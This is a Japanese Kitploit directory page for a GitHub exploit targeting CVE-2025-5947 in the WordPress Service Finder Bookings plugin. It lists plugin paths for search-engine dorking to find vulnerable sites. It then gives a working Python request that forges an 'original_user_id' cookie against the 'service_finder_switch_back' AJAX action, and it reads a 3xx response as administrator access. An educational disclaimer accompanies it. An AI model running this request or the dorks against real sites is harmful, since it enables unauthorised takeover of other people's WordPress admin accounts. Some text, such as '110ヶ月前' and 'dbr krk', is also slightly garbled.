Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-5947_Exploit — Service Finder -BookingsプラグインWP用のミニエクスプロイト | Kitploit
ツール/GitHubGitHub/m4rgs/cve-2025-5947_exploit
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

Service Finder -BookingsプラグインWP用のミニエクスプロイト

リポジトリを見る
110ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔍 WordPress プラグインのエクスプロイト — Service Finder (sf-booking)

概要

Service Finder プラグインは、WordPress 向けの予約・サービス管理システムです。
その人気と複雑さから、一部のバージョンでは認証されていない AJAX エンドポイントや不適切なアクセス制御に関連するセキュリティ問題が発生しています。

この README は、研究者がインストール環境を安全にフィンガープリントし、倫理的な慣行に従う方法を説明するものです(dbr krk)。


脆弱な WP ダーク(検索クエリ)

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


エクスプロイトのワークフロー

⚠️ 免責事項:
これらの検索は教育目的および研究目的のみに使用してください。不正アクセスや悪用を試みないでください。

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ 脆弱性あり!管理者として管理パネルにリダイレクト
  • 400-499: ⚠️ クライアントエラー — リクエストが無効または未承認であり、脆弱性なし

参考情報

  • WPScan プラグインデータベース — https://wpscan.com/plugins/
  • 国家脆弱性データベース(NVD) — https://nvd.nist.gov/
  • OWASP — Google ダーキング / 偵察技術
  • HackerOne 開示ガイドライン — https://www.hackerone.com/disclosure-guidelines

作成者

Taha Mounir


ツールをダウンロード